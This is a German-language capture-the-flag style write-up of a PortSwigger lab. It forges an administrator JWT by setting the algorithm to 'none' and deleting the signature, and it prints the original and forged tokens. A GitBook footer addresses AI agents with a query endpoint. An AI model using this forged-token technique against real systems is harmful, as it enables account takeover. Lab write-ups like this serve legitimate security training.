> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/jwt/jwt-authentication-bypass-via-flawed-signature-verification.md).

# JWT-Authentifizierungsumgehung durch fehlerhafte Signaturprüfung

### JWT-Authentifizierungsumgehung durch fehlerhafte Signaturprüfung

**Lab-Hintergrund**

Dieses Labor verwendet **JSON Web Tokens (JWT)** zur Verwaltung von Benutzersitzungen. / Die Serverkonfiguration ist falsch: Sie \*\*akzeptiert unsignierte JWTs\*\*, wodurch ein gültiges Token gefälscht werden kann, ohne den privaten Schlüssel zu besitzen.

**Ziel:**

* Sitzungs-JWT bearbeiten, um Zugriff zu erhalten `/admin` das Administrationspanel
* Benutzer löschen **carlos**

**Bereitgestellte Zugangsdaten:**

* Benutzer: `wiener`
* Passwort: `peter`

\*\* Erste JWT-Analyse\*\*

Nach der Anmeldung wird ein JWT-Sitzungscookie bereitgestellt:

```bash
eyJraWQiOiJhZTJhMTg3MS05MDJkLTQ2YTctYWFiOC1mOTU1OGJiMGU2NGUiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc2NzUzMTU3Niwic3ViIjoid2llbmVyIn0.CDQZmT-cC5Oa1A4yVjgEu1HVYC_J7aZ_Utfjkbdy8D0frSJVeZygaS82Frj4ZI6q8a0XGgvDE1NEJ1TQdnrJ2WSFRWoew7Nen9FJe1X_Rz2nHVKCA5kk30Kx2xB9BQ6ij-wbQLLcZkPV4CqklQ51CwPwrxCfPzpGXxCGOhjOvfYTeZzmKrskOzTG1Ikk3rv4JGWY1GKATeRXuZgbIUxG4QsHS7bDOzcUCuhUiUj4uu4gWE2FvZFLpnbNC1VvtUyq37Qqrqo78IomtnA3pe6e285IzkIr8IK-iiLVvkV4q2pTDI4-FIaMsaqMvyLvBWqsHMR-OXL4MJZMQho0E1Cdtw
```

* **Kopfzeile**: `RS256` Algorithmus
* **Payload**: `wiener` Benutzer
* **Signatur**: ursprünglich und gültig

**Payload-Änderung**

Das Ziel ist, sich als Administrator auszugeben. / Der `sub` Feld wird im Payload geändert:

```json
{
  "iss": "portswigger",
  "exp": 1767531576,
  "sub": "administrator"
}
```

<figure><img src="/files/91e989e865f39cde15f82d2012b059c97b59a2de" alt=""><figcaption></figcaption></figure>

**Ausnutzung der fehlerhaften Überprüfung**

Der Server akzeptiert JWTs mit `none` Algorithmus. / Der **Header** wird dann geändert:

```json
{
  "kid": "ae2a1871-902d-46a7-aab8-f9558bb0e64e",
  "alg": "none"
}
```

<figure><img src="/files/7548601b7991aafc1e30feddbf3b9a0a6fdd5dbf" alt=""><figcaption></figcaption></figure>

Als Nächstes:

* Die Signatur wird vollständig gelöscht\*\*
* Das finale JWT endet mit einem Punkt (`.`)

{% code overflow="wrap" %}

```bash
eyJraWQiOiJhZTJhMTg3MS05MDJkLTQ2YTctYWFiOC1mOTU1OGJiMGU2NGUiLCJhbGciOiJub25lIn0%3d.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc2NzUzMjI2NSwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.
```

{% endcode %}

**Ergebnis**

* Der Server \*\*akzeptiert unsignierte JWTs\*\*
* Zugriff auf `/admin` Panel ist erlaubt
* Benutzer **carlos** kann gelöscht werden

<figure><img src="/files/8e4879a4d600ff6252bf38f993251bed823e2254" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/jwt/jwt-authentication-bypass-via-flawed-signature-verification.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
